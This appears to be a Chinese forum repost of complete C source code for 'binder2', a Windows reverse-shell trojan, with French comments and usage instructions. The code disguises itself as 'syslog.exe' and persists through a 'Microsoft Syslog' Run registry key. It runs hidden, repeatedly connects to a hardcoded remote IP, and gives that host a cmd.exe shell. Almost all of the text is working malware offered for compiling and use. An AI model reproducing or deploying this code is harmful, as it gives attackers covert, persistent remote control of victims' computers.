一个简单的反弹木马binder2源码zz

t920

1. /*
   
2. * Trivial Reverse cmd binder
   
3. *
   
4. * When LAN is full, ThreaT will walk on your network
   
5. *
   
6.   ******************************
   
7. 
   
8.   compile : cl.exe binder2.c
   
9. 
   
10. 
    
11.   Usage
    
12.   _____
    
13.   
    
14.   binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)
    
15.   binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)
    
16.   binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)
    
17.   binder2 /kill (remove startkey of the registery)
    
18. 
    
19.   
    
20.   ******************************
    
21. *
    
22. * ThreaT@Ifrance.com
    
23. * http://s0h.cc/~threat/
    
24. *
    
25. */
    
26. 
    
27. 
    
28. #include <winsock2.h>;
    
29. 
    
30. #pragma comment(lib, "ws2_32.lib")
    
31. #pragma comment(lib, "advapi32.lib")
    
32. #pragma comment(lib, "user32.lib")
    
33. 
    
34. /* Win entry point (sa evite d'avoir une grosse console crade qui s'affiche ) */
    
35. 
    
36. int WINAPI WinMain(
    
37.     HINSTANCE  hInstance,
    
38.     HINSTANCE  hPrevInstance,       
    
39.     LPSTR  lpszCmdLine,
    
40.     int  nCmdShow
    
41.    )
    
42. {
    
43. 
    
44.         WSADATA wd;
    
45.         HKEY MyKey;
    
46.         SOCKET sock;
    
47.         STARTUPINFO si;
    
48.         PROCESS_INFORMATION pi;
    
49.         struct sockaddr_in sin;
    
50.         char buffer[MAX_PATH], cmd[MAX_PATH], *p,
    
51.                
    
52.         //IP[16] = "81.91.66.30\x00";    // adresse IP par default (ici www.s0h.cc)
    
53.         IP[16] = "192.168.108.99\x00";    // adresse IP par default (ici www.s0h.cc)
    
54.         unsigned short port = 1234;    // port par default
    
55. 
    
56.         /* backdoor le bordel */
    
57.         GetWindowsDirectory (buffer,MAX_PATH);
    
58.         lstrcat (buffer,"\\syslog.exe\x00");
    
59.         GetModuleFileName (NULL,cmd,MAX_PATH);
    
60. 
    
61.         CopyFile (cmd,buffer,FALSE);
    
62.         RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
    
63.         RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));
    
64. 
    
65.         /* traite les eventuels arguments */
    
66.         p = strtok (lpszCmdLine," ");       
    
67.         if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))
    
68.         {
    
69.                 if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}
    
70.                 else port = atoi (lpszCmdLine);
    
71. 
    
72.                 if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);
    
73.         }
    
74. 
    
75.         /* prepare la sauce */
    
76.         memset(&si, 0, sizeof(si));
    
77.         WSAStartup(MAKEWORD( 1, 1 ), &wd);
    
78. 
    
79.         // David Litchfield in his Blackhat talk said... (PJ)
    
80.         sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    
81.        
    
82.         sin.sin_family = AF_INET;
    
83.         sin.sin_port = htons(port);
    
84.         sin.sin_addr.s_addr = inet_addr(IP);
    
85. 
    
86.         /* tente une connexion toute les 30 secondes */
    
87.         while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000);
    
88.        
    
89.         /* balance le shell et ce casse */
    
90.         si.cb = sizeof(si);
    
91.         si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
    
92.         si.wShowWindow=SW_HIDE;
    
93.         si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
    
94.         CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
    
95.         return 0;
    
96. }
    
97. 
    
98. 
    
99. /*** no sousaille ma cacaille ***/

复制代码